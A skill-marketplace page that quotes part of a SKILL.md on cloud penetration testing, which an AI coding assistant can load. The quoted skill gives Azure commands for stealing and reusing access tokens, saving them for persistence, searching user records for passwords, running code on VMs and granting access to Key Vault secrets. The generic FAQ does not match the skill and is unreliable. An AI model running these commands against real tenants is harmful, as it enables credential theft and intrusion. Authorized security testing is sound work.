Cloud Penetration Testing
Cloud Penetration Testing is an code AI skill with a core value of This skill should be used when the user asks to \"perform cloud penetration testing\", \"assess Azure or AWS or GCP security\", \"enumerate cloud resources\", \"exploit cloud misconfiguratio. It
helps developers solve real-world problems in the code domain, boosting
efficiency, automating repetitive tasks, and optimizing workflows.
This skill should be used when the user asks to \"perform cloud penetration testing\", \"assess Azure or AWS or GCP security\", \"enumerate cloud resources\", \"exploit cloud misconfiguratio...
Quick Facts
mkdir -p ./skills/cloud-penetration-testing && curl -sfL https://raw.githubusercontent.com/sickn33/antigravity-awesome-skills/main/skills/cloud-penetration-testing/SKILL.md -o ./skills/cloud-penetration-testing/SKILL.md Run in terminal / PowerShell. Requires curl (Unix) or PowerShell 5+ (Windows).
Skill Content
# Cloud Penetration Testing
Purpose
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.
Prerequisites
Required Tools
# Azure tools
Install-Module -Name Az -AllowClobber -Force
Install-Module -Name MSOnline -Force
Install-Module -Name AzureAD -Force
# AWS CLI
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip && sudo ./aws/install
# GCP CLI
curl https://sdk.cloud.google.com | bash
gcloud init
# Additional tools
pip install scoutsuite pacuRequired Knowledge
- Cloud architecture fundamentals
- Identity and Access Management (IAM)
- API authentication mechanisms
- DevOps and automation concepts
Required Access
- Written authorization for testing
- Test credentials or access tokens
- Defined scope and rules of engagement
Outputs and Deliverables
1. **Cloud Security Assessment Report** - Comprehensive findings and risk ratings
2. **Resource Inventory** - Enumerated services, storage, and compute instances
3. **Credential Findings** - Exposed secrets, keys, and misconfigurations
4. **Remediation Recommendations** - Hardening guidance per platform
Core Workflow
Phase 1: Reconnaissance
Gather initial information about target cloud presence:
# Azure: Get federation info
curl "https://login.microsoftonline.com/getuserrealm.srf?login=user@target.com&xml=1"
# Azure: Get Tenant ID
curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"
# Enumerate cloud resources by company name
python3 cloud_enum.py -k targetcompany
# Check IP against cloud providers
cat ips.txt | python3 ip2provider.pyPhase 2: Azure Authentication
Authenticate to Azure environments:
# Az PowerShell Module
Import-Module Az
Connect-AzAccount
# With credentials (may bypass MFA)
$credential = Get-Credential
Connect-AzAccount -Credential $credential
# Import stolen context
Import-AzContext -Profile 'C:\Temp\StolenToken.json'
# Export context for persistence
Save-AzContext -Path C:\Temp\AzureAccessToken.json
# MSOnline Module
Import-Module MSOnline
Connect-MsolServicePhase 3: Azure Enumeration
Discover Azure resources and permissions:
# List contexts and subscriptions
Get-AzContext -ListAvailable
Get-AzSubscription
# Current user role assignments
Get-AzRoleAssignment
# List resources
Get-AzResource
Get-AzResourceGroup
# Storage accounts
Get-AzStorageAccount
# Web applications
Get-AzWebApp
# SQL Servers and databases
Get-AzSQLServer
Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG
# Virtual machines
Get-AzVM
$vm = Get-AzVM -Name "VMName"
$vm.OSProfile
# List all users
Get-MSolUser -All
# List all groups
Get-MSolGroup -All
# Global Admins
Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember -GroupObjectId $GUID
# Service Principals
Get-MsolServicePrincipalPhase 4: Azure Exploitation
Exploit Azure misconfigurations:
# Search user attributes for passwords
$users = Get-MsolUser -All
foreach($user in $users){
$props = @()
$user | Get-Member | foreach-object{$props+=$_.Name}
foreach($prop in $props){
if($user.$prop -like "*password*"){
Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)
}
}
}
# Execute commands on VMs
Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1
# Extract VM UserData
$vms = Get-AzVM
$vms.UserData
# Dump Key Vault secrets
az keyvault list --query '[].name' --output tsv
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
az keyvault secret list -🎯 Best For
- Security auditors
- DevSecOps teams
- Compliance officers
- QA engineers
- Developers writing unit tests
💡 Use Cases
- Auditing dependencies for known CVEs
- Scanning API endpoints for auth gaps
- Generating test cases for edge conditions
- Writing integration test suites
📖 How to Use This Skill
- 1
Install the Skill
Copy the install command from the Terminal tab and run it. The SKILL.md file downloads to your local skills directory.
- 2
Load into Your AI Assistant
Open Claude and reference the skill. Paste the SKILL.md content or use the system prompt tab.
- 3
Apply Cloud Penetration Testing to Your Work
Open your project in the AI assistant and ask it to apply the skill. Start with a small module to verify the output quality.
- 4
Review and Refine
Review AI suggestions before committing. Run tests, check for regressions, and iterate on the skill output.
❓ Frequently Asked Questions
Can this replace a dedicated SAST tool?
AI-based security review is complementary to SAST tools. Use it as a first-pass filter, not a replacement.
Does this generate test mocks?
Many testing skills include mock generation. Check the install command and skill content for details.
Is Cloud Penetration Testing compatible with Cursor and VS Code?
Yes — this skill works with any AI coding assistant including Cursor, VS Code with Copilot, and JetBrains IDEs.
Do I need specific dependencies for Cloud Penetration Testing?
Check the install command and Works With section. Most code skills only require the AI assistant and your codebase.
How do I install Cloud Penetration Testing?
Copy the install command from the Terminal tab and run it. The skill downloads to ./skills/cloud-penetration-testing/SKILL.md, ready to use.
⚠️ Common Mistakes to Avoid
Only scanning surface-level issues
Deep security review requires understanding your app architecture, not just regex patterns.
Not testing edge cases
AI tends to generate happy-path tests. Manually review for boundary conditions.
Skipping validation
Always test AI-generated code changes, even for simple refactors.
Missing dependency updates
Check if the skill requires updated dependencies or new packages.